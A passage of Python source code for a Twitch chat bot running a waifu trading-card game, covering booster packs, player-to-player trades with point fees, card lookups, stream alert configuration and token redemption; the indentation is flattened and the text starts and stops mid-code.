bannedCards=getUniqueCards(tags['user-id']))
if chosenWaifu is not None:
addPoints(tags['user-id'], 0 - price)
row = getWaifuById(chosenWaifu)
self.message(channel, str(
tags[
'display-name']) + ', you bought a new Waifu for {price} points: [{id}][{rarity}] {name} from {series} - {link}'.format(
id=str(row['id']), rarity=config["rarity" + str(row['base_rarity']) + "Name"], name=row['name'],
series=row['series'],
link=row['image'], price=str(price)), isWhisper=isWhisper)
recordPullMetrics(row['id'])
giveCard(tags['user-id'], row['id'], row['base_rarity'])
logDrop(str(tags['user-id']), row['id'], rarity, "buy", channel, isWhisper)
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
attemptPromotions(row['id'])
return
else:
self.message(channel, "You can't buy a %s waifu right now. Try again later." % config[
"rarity" + str(rarity) + "Name"], isWhisper)
return
if command == "booster":
if len(args) < 1:
self.message(channel,
"Usage: !booster list OR !booster buy <%s> OR !booster select <take/disenchant> (for each waifu) OR !booster show" % visiblepacks,
isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
cmd = args[0].lower()
# even more shorthand shortcut for disenchant all
if cmd == "trash":
cmd = "select"
args = ["select", "deall"]
cur = db.cursor()
cur.execute("SELECT id FROM boosters_opened WHERE userid = %s AND status = 'open'", [tags['user-id']])
boosterinfo = cur.fetchone()
if (cmd == "show" or cmd == "select") and boosterinfo is None:
self.message(channel, tags[
'display-name'] + ", you do not have an open booster. Buy one using !booster buy <%s>" % visiblepacks,
isWhisper=isWhisper)
cur.close()
return
if cmd == "show":
if len(args) > 1 and args[1].lower() == "verbose":
# TODO
pass
else:
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, your current open booster pack: {droplink}".format(
user=tags['display-name'], droplink=droplink), isWhisper=isWhisper)
cur.close()
return
if cmd == "select":
cur.execute("SELECT waifuid FROM boosters_cards WHERE boosterid = %s", [boosterinfo[0]])
cardrows = cur.fetchall()
cards = [row[0] for row in cardrows]
# check for shorthand syntax
if len(args) == 2:
if args[1].lower() == 'deall' or args[1].lower() == 'disenchantall':
selectArgs = ["disenchant"] * len(cards)
else:
selectArgs = []
for letter in args[1].lower():
if letter != 'd' and letter != 'k':
self.message(channel,
"When using shorthand booster syntax, please only use the letters d and k.",
isWhisper=isWhisper)
cur.close()
return
elif letter == 'd':
selectArgs.append("disenchant")
else:
selectArgs.append("keep")
else:
selectArgs = args[1:]
if len(selectArgs) != len(cards):
self.message(channel, "You did not specify the correct amount of keep/disenchant.",
isWhisper=isWhisper)
cur.close()
return
for arg in selectArgs:
if not (arg.lower() == "keep" or arg.lower() == "disenchant"):
self.message(channel,
"Sorry, but " + arg.lower() + " is not a valid option. Use keep or disenchant",
isWhisper=isWhisper)
cur.close()
return
# check card info for rarities etc
keepCards = []
deCards = []
keepingCount = 0
for i in range(len(cards)):
waifu = getWaifuById(cards[i])
if selectArgs[i].lower() == "keep":
keepCards.append(waifu)
if waifu['base_rarity'] < int(config["numNormalRarities"]):
keepingCount += 1
else:
# disenchant
if waifu['base_rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config[
"rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
deCards.append(waifu)
if keepingCount + currentCards(tags['user-id']) > handLimit(tags['user-id']) and keepingCount != 0:
self.message(channel, "You can't keep that many waifus! !disenchant some!", isWhisper=isWhisper)
cur.close()
return
trash = (keepingCount == 0)
# if we made it through the whole pack without tripping confirmation, we can actually do it now
for waifu in keepCards:
giveCard(tags['user-id'], waifu['id'], waifu['base_rarity'])
gottenpoints = 0
ordersFilled = 0
for waifu in deCards:
baseValue = int(config["rarity" + str(waifu['base_rarity']) + "Value"])
profit = attemptBountyFill(self, waifu['id'])
gottenpoints += baseValue + profit
if profit > 0:
ordersFilled += 1
elif waifu['base_rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu being disenchanted
threading.Thread(target=sendDisenchantAlert,
args=(channel, waifu, str(tags["display-name"]))).start()
addPoints(tags['user-id'], gottenpoints)
attemptPromotions(*cards)
# compile the message to be sent in chat
response = "You %s your booster pack%s" % (("trash", "") if trash else ("take"," and: "))
if len(keepCards) > 0:
response += " keep " + ', '.join(str(x['id']) for x in keepCards) + ";"
if len(deCards) > 0 and not trash:
response += " disenchant the rest"
if ordersFilled > 0:
response += " (filling %d bounties);" % ordersFilled
elif len(deCards) > 0:
response += ";"
self.message(channel, response + ((" netting " + str(gottenpoints) + " points.") if gottenpoints>0 else ""),
isWhisper=isWhisper)
cur.execute("UPDATE boosters_opened SET status = 'closed', updated = %s WHERE id = %s",
[current_milli_time(), boosterinfo[0]])
cur.close()
return
if cmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d points" % (row[0], row[1]) for row in boosters)
self.message(channel, "Current buyable packs: %s. !booster buy <name> to buy a booster with points." % boosterInfo, isWhisper)
return
if cmd == "buy":
if boosterinfo is not None:
self.message(channel,
"You already have an open booster. Close it first!",
isWhisper=isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !booster buy <%s>" % visiblepacks, isWhisper=isWhisper)
cur.close()
return
truepackname = packname = args[1].lower()
mega = False
if packname.startswith("mega"):
truepackname = packname[4:]
mega = True
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truepackname, True, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, you open a {type} booster: {droplink}".format(
user=tags['display-name'], type=packname, droplink=droplink), isWhisper=isWhisper)
except InvalidBoosterException:
self.message(channel, "Invalid booster type. Packs available right now: %s." % visiblepacks,
isWhisper=isWhisper)
except CantAffordBoosterException as exc:
self.message(channel,
"{user}, you don't have enough points for a {name} pack. You need {points}.".format(
user=tags['display-name'], name=packname, points=exc.cost),
isWhisper=isWhisper)
cur.close()
return
if command == "trade":
ourid = int(tags['user-id'])
with db.cursor() as cur:
# expire old trades
currTime = current_milli_time()
cur.execute(
"UPDATE trades SET status = 'expired', updated = %s WHERE status = 'open' AND created <= %s",
[currTime, currTime - 86400000])
if len(args) < 2:
self.message(channel,
"Usage: !trade <check/accept/decline> <user> OR !trade <user> <have> <want>",
isWhisper=isWhisper)
return
subarg = args[0].lower()
if subarg in ["check", "accept", "decline"]:
otherparty = args[1].lower()
cur.execute("SELECT id FROM users WHERE name = %s", [otherparty])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
# look for trade row
cur.execute(
"SELECT id, want, have, points, payup, want_rarity, have_rarity FROM trades WHERE fromid = %s AND toid = %s AND status = 'open' LIMIT 1",
[otherid, ourid])
trade = cur.fetchone()
if trade is None:
self.message(channel,
otherparty + " did not send you a trade. Send one with !trade " + otherparty + " <have> <want>",
isWhisper=isWhisper)
return
want = trade[1]
have = trade[2]
tradepoints = trade[3]
payup = trade[4]
want_rarity = trade[5]
have_rarity = trade[6]
if subarg == "check":
wantdata = getWaifuById(want)
havedata = getWaifuById(have)
haveStr = getWaifuRepresentationString(have, havedata['base_rarity'], have_rarity,
havedata['name'])
wantStr = getWaifuRepresentationString(want, wantdata['base_rarity'], want_rarity,
wantdata['name'])
payer = "they will pay you" if otherid == payup else "you will pay them"
if tradepoints > 0:
self.message(channel,
"{other} wants to trade their {have} for your {want} and {payer} {points} points. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer,
points=tradepoints), isWhisper=isWhisper)
else:
self.message(channel,
"{other} wants to trade their {have} for your {want}. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer),
isWhisper=isWhisper)
return
elif subarg == "decline":
cur.execute("UPDATE trades SET status = 'declined', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade declined.", isWhisper=isWhisper)
return
else:
# accept
# check that cards are still in place
ourhand = getHand(ourid)
otherhand = getHand(otherid)
try:
parseHandCardSpecifier(ourhand, "%d-%d" % (want, want_rarity))
except CardRarityNotInHandException:
self.message(channel,
"%s, the rarity of waifu %d in your hand has changed! Trade cancelled." % (
tags['display-name'], want), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
except CardNotInHandException:
self.message(channel, "%s, you no longer own waifu %d! Trade cancelled." % (
tags['display-name'], want), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
try:
parseHandCardSpecifier(otherhand, "%d-%d" % (have, have_rarity))
except CardRarityNotInHandException:
self.message(channel,
"%s, the rarity of %s's copy of waifu %d has changed! Trade cancelled." % (
tags['display-name'], otherparty, have), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
except CardNotInHandException:
self.message(channel, "%s, %s no longer owns waifu %d! Trade cancelled." % (
tags['display-name'], otherparty, have), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
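                        # both parties are charged the base trading fee; the payup side also transfers the agreed point difference, which the other side receives net of their own fee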
cost = int(config["tradingFee"])
nonpayer = ourid if payup == otherid else otherid
if not hasPoints(payup, cost + tradepoints):
self.message(channel, "Sorry, but %s cannot cover the %s trading fee." % (
"you" if payup == ourid else otherparty, "fair" if tradepoints > 0 else "base"),
isWhisper=isWhisper)
return
if not hasPoints(nonpayer, cost - tradepoints):
self.message(channel, "Sorry, but %s cannot cover the base trading fee." % (
"you" if nonpayer == ourid else otherparty), isWhisper=isWhisper)
return
# move the cards
# should preserve God image changes through the trade
godRarity = int(config["numNormalRarities"]) - 1
if want_rarity == godRarity:
cur.execute("UPDATE has_waifu SET userid = %s WHERE userid = %s AND waifuid = %s AND rarity = %s", [otherid, ourid, want, want_rarity])
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [ourid, want])
if cur.rowcount > 0:
# a request was actually cancelled
wantdata = getWaifuById(want)
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you traded it away." % (want, wantdata['name']), True)
else:
takeCard(ourid, want, want_rarity)
giveCard(otherid, want, want_rarity)
if have_rarity == godRarity:
cur.execute("UPDATE has_waifu SET userid = %s WHERE userid = %s AND waifuid = %s AND rarity = %s", [ourid, otherid, have, have_rarity])
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [otherid, have])
if cur.rowcount > 0:
# a request was actually cancelled
havedata = getWaifuById(have)
self.message("#%s" % otherparty, "Your image change request for [%d] %s was cancelled since you traded it away." % (have, havedata['name']), True)
else:
takeCard(otherid, have, have_rarity)
giveCard(ourid, have, have_rarity)
attemptPromotions(want, have)
if want_rarity >= int(config["numNormalRarities"]):
checkFavouriteValidity(ourid)
if have_rarity >= int(config["numNormalRarities"]):
checkFavouriteValidity(otherid)
# points
addPoints(payup, -(tradepoints + cost))
addPoints(nonpayer, tradepoints - cost)
# done
cur.execute("UPDATE trades SET status = 'accepted', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade executed!", isWhisper=isWhisper)
return
if len(args) < 3:
self.message(channel,
"Usage: !trade <accept/decline> <user> OR !trade <user> <have> <want>",
isWhisper=isWhisper)
return
other = args[0]
cur.execute("SELECT id FROM users WHERE name = %s", [other])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
ourhand = getHand(ourid)
otherhand = getHand(otherid)
try:
have = parseHandCardSpecifier(ourhand, args[1])
except CardRarityNotInHandException:
self.message(channel, "%s, you don't own that waifu at that rarity!" % tags['display-name'],
isWhisper)
return
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu!" % tags['display-name'], isWhisper)
return
except AmbiguousRarityException:
self.message(channel,
"%s, you own more than one rarity of waifu %s! Please specify a rarity as well by appending a hyphen and then the rarity, e.g. %s-god" % (
tags['display-name'], args[1], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs + rarities please.", isWhisper)
return
try:
want = parseHandCardSpecifier(otherhand, args[2])
except CardRarityNotInHandException:
self.message(channel,
"%s, %s doesn't own that waifu at that rarity!" % (tags['display-name'], other),
isWhisper)
return
except CardNotInHandException:
self.message(channel, "%s, %s doesn't own that waifu!" % (tags['display-name'], other),
isWhisper)
return
except AmbiguousRarityException:
self.message(channel,
"%s, %s owns more than one rarity of waifu %s! Please specify a rarity as well by appending a hyphen and then the rarity, e.g. %s-god" % (
tags['display-name'], other, args[2], args[2]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs + rarities please.", isWhisper)
return
# actual specials can't be traded
firstSpecialRarity = int(config["numNormalRarities"])
if have["rarity"] == firstSpecialRarity or want["rarity"] == firstSpecialRarity:
self.message(channel, "Sorry, cards of that rarity cannot be traded.", isWhisper)
return
payup = ourid
canTradeDirectly = (want["rarity"] == have["rarity"]) or (
want["rarity"] >= firstSpecialRarity and have["rarity"] >= firstSpecialRarity)
points = 0
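                # cross-rarity trades between normal rarities are settled with points equal to the difference of the two rarities' configured values; the side receiving the higher-rarity card pays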
if not canTradeDirectly:
if have["rarity"] >= firstSpecialRarity or want["rarity"] >= firstSpecialRarity:
self.message(channel,
"Sorry, irregular rarity cards can only be traded for other irregular rarity cards.",
isWhisper=isWhisper)
return
highercost = int(config["rarity" + str(max(have["rarity"], want["rarity"])) + "Value"])
lowercost = int(config["rarity" + str(min(have["rarity"], want["rarity"])) + "Value"])
points = highercost - lowercost
if want["rarity"] < have["rarity"]:
payup = otherid
# cancel any old trades with this pairing
cur.execute(
"UPDATE trades SET status = 'cancelled', updated = %s WHERE fromid = %s AND toid = %s AND status = 'open'",
[current_milli_time(), ourid, otherid])
# insert new trade
tradeData = [ourid, otherid, want['id'], want['rarity'], have['id'], have['rarity'], points, payup,
current_milli_time(), "$$whisper$$" if isWhisper else channel]
cur.execute(
"INSERT INTO trades (fromid, toid, want, want_rarity, have, have_rarity, points, payup, status, created, originChannel) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, 'open', %s, %s)",
tradeData)
havedata = getWaifuById(have['id'])
wantdata = getWaifuById(want['id'])
haveStr = getWaifuRepresentationString(have['id'], havedata['base_rarity'], have['rarity'],
havedata['name'])
wantStr = getWaifuRepresentationString(want['id'], wantdata['base_rarity'], want['rarity'],
wantdata['name'])
paying = ""
if points > 0:
if payup == ourid:
paying = " with you paying them " + str(points) + " points"
else:
paying = " with them paying you " + str(points) + " points"
self.message(channel,
"Offered {other} to trade your {have} for their {want}{paying}".format(other=other,
have=haveStr,
want=wantStr,
paying=paying),
isWhisper=isWhisper)
return
if command == "lookup":
if len(args) != 1:
self.message(channel, "Usage: !lookup <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerDescriptions = getWaifuOwners(waifu['id'], waifu['base_rarity'])
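                    # show at most two named owners and collapse the rest into an "N others" entry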
if len(ownerDescriptions) > 3:
ownerDescriptions = ownerDescriptions[0:2] + ["%d others" % (len(ownerDescriptions) - 2)]
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
# check for packs
with db.cursor() as cur:
cur.execute(
"SELECT users.name FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid = boosters_opened.id JOIN users ON boosters_opened.userid = users.id WHERE boosters_cards.waifuid = %s AND boosters_opened.status = 'open'",
[waifu['id']])
packholders = [row[0] for row in cur.fetchall()]
if len(ownerDescriptions) > 0:
waifu["owned"] = " - owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " - in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " (not currently owned or in a pack)"
else:
waifu["owned"] = " (not dropped yet)"
# bounty info
if waifu["base_rarity"] >= int(config["numNormalRarities"]):
waifu["bountyinfo"] = ""
waifu["lp"] = ""
else:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] > 0:
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
waifu[
"bountyinfo"] = " {count} current bounties, your bid is highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, your bid of {mine} points is lower than the highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, the highest bid is {highest} points.".format(
**minfo)
else:
waifu["bountyinfo"] = "No current bounties on this waifu."
# last pull
if waifu["pulls"] == 0 or waifu["last_pull"] is None:
waifu["lp"] = ""
else:
lpdiff = (current_milli_time() - waifu["last_pull"]) // 86400000
if lpdiff == 0:
waifu["lp"] = " Last pulled less than a day ago."
elif lpdiff == 1:
waifu["lp"] = " Last pulled 1 day ago."
else:
waifu["lp"] = " Last pulled %d days ago." % lpdiff
self.message(channel,
'[{id}][{rarity}] {name} from {series} - {image}{owned}. {bountyinfo}{lp}'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception as exc:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "owners":
if len(args) != 1:
self.message(channel, "Usage: !owners <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerDescriptions = getWaifuOwners(waifu['id'], waifu['base_rarity'])
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
# check for packs
with db.cursor() as cur:
cur.execute(
"SELECT users.name FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid = boosters_opened.id JOIN users ON boosters_opened.userid = users.id WHERE boosters_cards.waifuid = %s AND boosters_opened.status = 'open'",
[waifu['id']])
packholders = [row[0] for row in cur.fetchall()]
if len(ownerDescriptions) > 0:
waifu["owned"] = " is owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " is in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " is not currently owned or in a pack"
else:
waifu["owned"] = " has not dropped yet"
self.message(channel,
'[{id}][{rarity}] {name} from {series}{owned}.'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "whisper":
if followsme(tags['user-id']):
self.message("#jtv", "/w {user} This is a test whisper.".format(user=sender), isWhisper=False)
self.message(channel, "Attempted to send test whisper.", isWhisper=isWhisper)
else:
self.message(channel, "{user}, you need to be following me so I can send you whispers!".format(
user=str(tags['display-name'])), isWhisper=isWhisper)
return
if command == "help":
            self.message(channel, config["siteHost"] + "/help", isWhisper=isWhisper)
            return
if command == "alerts" or command == "alert":
if len(args) < 1:
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity/set> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
sender = sender.lower()
subcmd = str(args[0]).lower()
if subcmd == "setup":
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
if row is None:
self.message(channel,
"The bot is not in your channel, so alerts can't be set up for you. Ask an admin to let it join!",
isWhisper=isWhisper)
                    cur.close()
                    return
if row[0] is None:
self.message("#jtv",
"/w {user} Please go to the following link and allow access: {link}{user}".format(
user=sender.strip(), link=str(streamlabsauthurl).strip()), isWhisper=False)
self.message(channel,
"Sent you a whisper with a link to set up alerts. If you didnt receive a whisper, try !whisper",
isWhisper=isWhisper)
else:
self.message(channel,
"Alerts seem to already be set up for your channel! Use !alerts test to test them!",
isWhisper)
cur.close()
return
if subcmd == "test":
isSet = False
if len(args) > 1 and args[1].lower() == "set":
rarity = int(config["numNormalRarities"]) - 1
isSet = True
else:
try:
rarity = parseRarity(args[1])
except Exception:
rarity = int(config["numNormalRarities"]) - 1
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
cur.close()
if row is None or row[0] is None:
self.message(channel,
"Alerts do not seem to be set up for your channel, please set them up using !alerts setup",
isWhisper=isWhisper)
else:
if isSet:
threading.Thread(target=sendSetAlert, args=(
sender, sender, "Test Set", ["Neptune", "Nepgear", "Some other test waifu"], 0,
False)).start()
else:
threading.Thread(target=sendDrawAlert, args=(
sender, {"name": "Test Alert, please ignore", "base_rarity": rarity,
"image": "http://t.fuelr.at/k6g"},
str(tags["display-name"]), False)).start()
self.message(channel, "Test Alert sent.", isWhisper=isWhisper)
return
if subcmd == "config":
try:
configName = args[1]
except Exception:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
if configName == "reset":
cur = db.cursor()
cur.execute("DELETE FROM alertConfig WHERE channelName = %s", [sender])
cur.close()
self.message(channel, "Removed all custom alert config for your channel. #NoireScreamRules",
isWhisper=isWhisper)
return
if configName not in validalertconfigvalues:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
try:
configValue = args[2]
except Exception:
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if len(rows) != 1:
self.message(channel, 'Alert config "' + configName + '" is unset for your channel.',
isWhisper=isWhisper)
else:
configValue = rows[0][0]
self.message(channel,
'Alert config "' + configName + '" is set to "' + configValue + '" for your channel.',
isWhisper=isWhisper)
cur.close()
return
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if configValue == "reset":
cur.execute("DELETE FROM alertConfig WHERE channelName=%s AND config=%s", [sender, configName])
cur.close()
self.message(channel, 'Reset custom alert config "' + configName + '" for your channel.',
isWhisper=isWhisper)
return
if configName == "alertChannel" and configValue not in ["host", "donation", "follow", "reset",
"subscription"]:
self.message(channel,
'Valid options for alertChannel: "host", "donation", "follow", "subscription", "reset"')
cur.close()
return
if len(rows) == 1:
cur.execute("UPDATE alertConfig SET val=%s WHERE channelName=%s AND config = %s",
[configValue, sender, configName])
else:
cur.execute("INSERT INTO alertConfig(val, channelName, config) VALUE (%s, %s, %s)",
[configValue, sender, configName])
cur.close()
self.message(channel, 'Set alert config value "' + configName + '" to "' + configValue + '"',
isWhisper=isWhisper)
return
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
if command == "togglehoraro" and sender in admins and booleanConfig("marathonBotFunctions"):
self.autoupdate = not self.autoupdate
if self.autoupdate:
self.message(channel, "Enabled Horaro Auto-update.", isWhisper=isWhisper)
else:
self.message(channel, "Disabled Horaro Auto-update.", isWhisper=isWhisper)
return
if sender in admins and command in ["status", "title"] and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateTitle(" ".join(args))
self.message(channel, "%s -> Title updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and command == "game" and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateGame(" ".join(args))
self.message(channel, "%s -> Game updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and booleanConfig("marathonBotFunctions") and command == "ffzfollowing":
MarathonBot.instance.updateFollowButtons(args)
self.message(channel, "%s -> Attempted to update follower buttons to %s." % (tags['display-name'], ", ".join(args)))
return
if command == "emotewar":
if int(config["emoteWarStatus"]) == 0:
self.message(channel, "The Emote War is not active right now.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT `name`, `count` FROM emoteWar ORDER BY `count` DESC")
r = cur.fetchall()
msg = "Current War: " if int(config["emoteWarStatus"]) == 1 else "THE WAR HAS BEEN DECIDED: "
for row in r:
msg += str(row[0]) + " " + str(row[1]) + " "
msg += ". Spamming DOES NOT COUNT, spammers will get timed out."
self.message(channel, msg, isWhisper=isWhisper)
return
if command == "nepjoin" and sender.lower() in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !nepjoin <channelname>", isWhisper=isWhisper)
return
chan = str(args[0]).replace("'", "").lower()
if ('#' + chan) in self.mychannels or ('#' + chan) in self.addchannels:
self.message(channel, "Already in that channel!", isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM users WHERE name=%s", [str(chan)])
if (cur.fetchone()[0] or 0) < 1:
self.message(channel,
"That user is not yet in the database! Let them talk in a channel the Bot is in to change that!",
isWhisper=isWhisper)
cur.close()
return
cur.execute("INSERT INTO channels(name) VALUES (%s)", [str(chan)])
self.join("#" + chan)
self.message("#" + chan, "Hi there!", isWhisper=False)
self.addchannels.append('#' + chan)
self.message(channel, "Joined #" + chan, isWhisper=isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Tried joining, failed. Tell Marenthyu the following: " + str(sys.exc_info()),
isWhisper=isWhisper)
logger.error("Error Joining channel %s: %s", chan, str(sys.exc_info()))
return
if command == "nepleave" and (sender in superadmins or ("#" + sender) == str(channel)):
if len(args) > 0:
self.message(channel, "nepleave doesn't take in argument. Type it in the channel to leave.",
isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("DELETE FROM channels WHERE name = %s", [channel[1:]])
self.leavechannels.append(str(channel))
# self.mychannels.remove(str(channel))
self.message(channel, "ByeBye!", isWhisper=False)
self.part(channel)
cur.close()
return
except Exception:
self.message(channel, "Tried to leave but failed D:", isWhisper=isWhisper)
logger.error("Error leaving %s: %s", channel, str(sys.exc_info()))
return
if command == "reload" and sender in superadmins:
# print("in reload command")
loadConfig()
self.message(channel, "Config reloaded.", isWhisper=isWhisper)
return
if command == "redeem":
if len(args) != 1:
self.message(channel, "Usage: !redeem <token>", isWhisper=isWhisper)
return
cur = db.cursor()
            # look up a claimable token that this user is allowed to redeem
cur.execute(
"SELECT id, points, waifuid, boostername, type, badgeID FROM tokens WHERE token=%s AND claimable=1 AND (only_redeemable_by IS NULL OR only_redeemable_by = %s) AND (not_redeemable_by IS NULL OR not_redeemable_by != %s) LIMIT 1",
[args[0], tags['user-id'], tags['user-id']])
redeemablerows = cur.fetchall()
if len(redeemablerows) == 0:
self.message(channel, "Unknown token.", isWhisper)
cur.close()
return
redeemdata = redeemablerows[0]
# already claimed by this user?
cur.execute("SELECT COUNT(*) FROM tokens_claimed WHERE tokenid = %s AND userid = %s",
[redeemdata[0], tags['user-id']])
claimed = cur.fetchone()[0] or 0
if claimed > 0:
self.message(channel, "%s, you have already claimed this token!" % tags['display-name'], isWhisper)
cur.close()
return
# booster?
packid = None
received = []
if redeemdata[3] is not None:
# check for an open booster in their account
# checked first because it's the only way a redeem can be blocked entirely
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't claim this token while you have an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
cur.close()
return
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, redeemdata[3],
False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
received.append("a free booster: %s/booster?user=%s" % (config["siteHost"], sender))
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % redeemdata[3]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your redeem, please try again later.",
isWhisper)
cur.close()
return
# waifu?
if redeemdata[2] is not None:
waifuinfo = getWaifuById(redeemdata[2])
giveCard(tags['user-id'], waifuinfo['id'], waifuinfo['base_rarity'])
if waifuinfo['base_rarity'] < int(config["numNormalRarities"]) - 1:
attemptPromotions(waifuinfo['id'])
waifuinfo['rarity'] = config["rarity%dName" % waifuinfo['base_rarity']]
received.append("A waifu: [{id}][{rarity}] {name} from {series}".format(**waifuinfo))
# points
if redeemdata[1] != 0:
addPoints(tags['user-id'], redeemdata[1])
received.append("%d points" % redeemdata[1])
# badge?
if redeemdata[5] is not None:
badge = getBadgeByID(redeemdata[5])
success = giveBadge(tags['user-id'], badge["id"])
if success:
received.append("A shiny new Badge: %s" % badge["name"])
else:
received.append("An invalid badge, or a badge you already had: %s" % badge["name"])
cur.execute(
